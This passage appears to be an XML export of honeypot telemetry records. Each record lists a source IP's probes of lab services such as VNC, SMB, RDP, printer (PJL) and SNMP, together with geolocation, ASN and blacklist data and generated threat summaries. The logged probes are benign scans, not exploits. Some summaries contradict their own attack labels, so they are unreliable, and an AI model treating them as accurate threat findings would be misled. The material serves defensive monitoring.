    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="None"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2022-07-15 16:05:05"/>
    <s v="2030-07-15 16:05:05"/>
    <s v="2025-01-12 12:07:03"/>
    <s v="['NS1.DYNU.COM', 'NS2.DYNU.COM', 'NS3.DYNU.COM', 'NS4.DYNU.COM', 'NS5.DYNU.COM', 'NS6.DYNU.COM']"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']"/>
    <s v="None"/>
    <x v="8"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3ede"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The data indicates that an attempt was made to access a VNC service but it failed, suggesting a potential brute-force or reconnaissance activity."/>
    <m/>
  </r>
  <r>
    <x v="489"/>
    <x v="489"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T02:04:01"/>
    <d v="2023-07-25T08:26:27"/>
    <d v="2025-04-29T02:04:01"/>
    <n v="1713"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_IRC_H7&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SIP_H7&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_MSSQL_H21&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_LDAP_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;9100&amp;&amp;143&amp;&amp;5432&amp;&amp;21&amp;&amp;55635&amp;&amp;6667&amp;&amp;445&amp;&amp;NA&amp;&amp;3389&amp;&amp;23&amp;&amp;50343&amp;&amp;110&amp;&amp;161&amp;&amp;1080&amp;&amp;1521&amp;&amp;6379&amp;&amp;3306&amp;&amp;1433&amp;&amp;56288&amp;&amp;443&amp;&amp;389&amp;&amp;50020&amp;&amp;50854&amp;&amp;49441&amp;&amp;50580&amp;&amp;5900&amp;&amp;49842&amp;&amp;49158&amp;&amp;49493"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="101"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58096)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58102)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58108)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63186)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63194)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63210)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xmPNKGVYv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qUqHfH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OLdYpz'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58794)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58796)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58808)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63352)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63358)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63364)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oVycRJ'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63570)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63582)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,63598)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1832"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unknown IRC connection attempt detected, suggesting potential malicious activity or reconnaissance. No further information is available from this single log entry. Further investigation is needed to determine the intent behind this action. &amp;&amp; The system attempted to access LDAP services but the attempt was unsuccessful as it could not obtain any relevant data indicating potential probing or reconnaissance activity. This may be an initial step by attackers to gather information before launching a full-scale attack. The lack of success in obtaining data suggests caution is needed to determine the intent behind this activity."/>
    <s v="LDAP Attack"/>
  </r>
  <r>
    <x v="490"/>
    <x v="490"/>
    <s v="unassigned.172-81-60-236.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T01:34:21"/>
    <d v="2023-11-26T19:54:32"/>
    <d v="2025-04-29T01:34:21"/>
    <n v="892"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;65487&amp;&amp;53424&amp;&amp;50578&amp;&amp;61633&amp;&amp;56565&amp;&amp;60460&amp;&amp;58435&amp;&amp;64014&amp;&amp;57408&amp;&amp;49665&amp;&amp;53312&amp;&amp;51648&amp;&amp;65193&amp;&amp;50482&amp;&amp;51096&amp;&amp;62524&amp;&amp;58888&amp;&amp;60229&amp;&amp;63715&amp;&amp;64475"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3cec"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No VNC (Virtual Network Computing) activity detected, which could be an evasion tactic to avoid detection or simply no connection attempt made to the service."/>
    <s v="Unknown Attack"/>
  </r>
  <r>
    <x v="491"/>
    <x v="491"/>
    <s v="unassigned.172-81-62-243.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T01:10:02"/>
    <d v="2024-01-18T11:09:20"/>
    <d v="2025-04-29T01:10:02"/>
    <n v="946"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;59256&amp;&amp;22&amp;&amp;36277&amp;&amp;54093&amp;&amp;56755&amp;&amp;52528&amp;&amp;51417&amp;&amp;49658&amp;&amp;53384&amp;&amp;54086&amp;&amp;65102&amp;&amp;54415&amp;&amp;50507&amp;&amp;59299&amp;&amp;57228"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ef3"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unknown VNC connection attempt, possible brute force or reconnaissance activity detected. No authentication information provided. Indicates potential vulnerability exploitation."/>
    <s v="VNC Attack"/>
  </r>
  <r>
    <x v="492"/>
    <x v="492"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T01:02:31"/>
    <d v="2025-04-29T01:02:31"/>
    <d v="2025-04-29T01:02:31"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:5078"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious activity detected, TELNET service not accessed. No attempts made to connect or interact with this service. Service remains inactive. &amp;&amp; No TELNET activity detected, potentially indicating a targeted scan or attempted intrusion of this service."/>
    <s v="Telnet Brute &amp;&amp; PortScan _x000a__x000a_(No activity detected)"/>
  </r>
  <r>
    <x v="493"/>
    <x v="493"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T01:01:24"/>
    <d v="2025-04-29T00:50:43"/>
    <d v="2025-04-29T01:01:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1109"/>
    <s v="52.374"/>
    <s v="4.88969"/>
    <s v="39351"/>
    <s v="31173 Services AB"/>
    <s v="31173 Services AB"/>
    <s v="cellular"/>
    <s v="31173 Services Netherlands"/>
    <s v="2019-10-08"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c120:f9a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="494"/>
    <x v="494"/>
    <s v="unassigned.172-81-62-184.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T01:01:21"/>
    <d v="2024-04-10T12:35:00"/>
    <d v="2025-04-29T01:01:21"/>
    <n v="666"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;50297&amp;&amp;20802&amp;&amp;56193&amp;&amp;63263&amp;&amp;54221&amp;&amp;63100&amp;&amp;62971&amp;&amp;51306&amp;&amp;64275&amp;&amp;49221&amp;&amp;58295&amp;&amp;56534&amp;&amp;53150&amp;&amp;50958&amp;&amp;58561&amp;&amp;64282&amp;&amp;57468&amp;&amp;55957"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eb8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="495"/>
    <x v="495"/>
    <s v="unassigned.172-81-62-168.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:57:15"/>
    <d v="2023-11-17T06:56:26"/>
    <d v="2025-04-29T00:57:15"/>
    <n v="12257"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;65440&amp;&amp;9630&amp;&amp;62883&amp;&amp;64567&amp;&amp;54306&amp;&amp;60981&amp;&amp;55585&amp;&amp;54030&amp;&amp;49964&amp;&amp;49244&amp;&amp;49909&amp;&amp;59667&amp;&amp;64971&amp;&amp;49727&amp;&amp;57104&amp;&amp;53522&amp;&amp;58713&amp;&amp;55637&amp;&amp;50575&amp;&amp;61293"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
